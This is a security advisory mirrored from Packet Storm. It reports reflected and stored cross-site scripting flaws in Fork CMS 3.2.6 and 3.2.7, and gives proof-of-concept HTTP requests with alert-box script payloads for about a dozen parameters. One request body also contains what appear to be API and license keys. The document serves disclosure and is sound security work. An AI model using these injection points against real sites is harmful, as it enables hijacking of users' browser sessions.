Fork CMS 3.2.7 Cross Site Scripting

2012-03-06T00:00:00
ID PACKETSTORM:110459
Type packetstorm
Reporter LiquidWorm
Modified 2012-03-06T00:00:00

Description

                                        
                                            `  
Fork CMS 3.2.7 Multiple HTML Code Injection Vulnerabilities  
  
  
Vendor: Fork CMS  
Product web page: http://www.fork-cms.com  
Affected version: 3.2.7 and 3.2.6  
  
Summary: Fork is an open source cms that will rock your world.  
  
Desc: Fork CMS suffers from multiple XSS vulnerabilities when  
parsing user input to several parameters in different scripts,  
via POST and GET methods. Attackers can exploit these weaknesses  
to execute arbitrary HTML and script code in a user's browser  
session.  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
Apache 2.2.21  
PHP 5.3.9  
MySQL 5.5.20  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
  
Advisory ID: ZSL-2012-5076  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5076.php  
  
Vendor: http://forkcms.lighthouseapp.com/projects/61890/tickets/277-multiple-cross-site-scripting-xss-vulnerabilities-in-fork-cms-327  
  
  
26.02.2012  
  
---  
  
----------------------------  
  
Parameter: form_token  
Method: POST  
  
- POST /private/en/authentication/?querystring=/private/en HTTP/1.1  
Content-Length: 134  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in  
  
----------------------------  
  
Parameter: value  
Method: GET  
  
- http://localhost/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script>  
  
----------------------------  
  
Parameter: name  
Method: GET  
  
- http://localhost/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script>  
  
----------------------------  
  
Parameter: type[]  
Method: GET  
  
- http://localhost/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script>  
  
----------------------------  
  
Parameter: module  
Method: GET  
  
- http://localhost/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script>  
  
----------------------------  
  
Parameter: application  
Method: GET  
  
- http://localhost/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script>  
  
----------------------------  
  
Parameter: language  
Method: GET  
  
- http://localhost/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script>  
  
----------------------------  
  
Parameters: position_1, position_2, position_3, position_4  
Method: POST  
  
- POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1  
  
form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D  
  
----------------------------  
  
Parameter: success_message  
Method: POST  
  
- POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1  
  
form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en  
  
----------------------------  
  
Parameter: smtp_password  
Method: POST  
  
- POST http://localhost/private/en/settings/email HTTP/1.1  
  
form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script>  
  
----------------------------  
  
Parameters: site_html_footer, site_html_header  
Method: POST  
  
- POST http://localhost/private/en/settings/index HTTP/1.1  
  
form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret=  
  
----------------------------  
  
  
`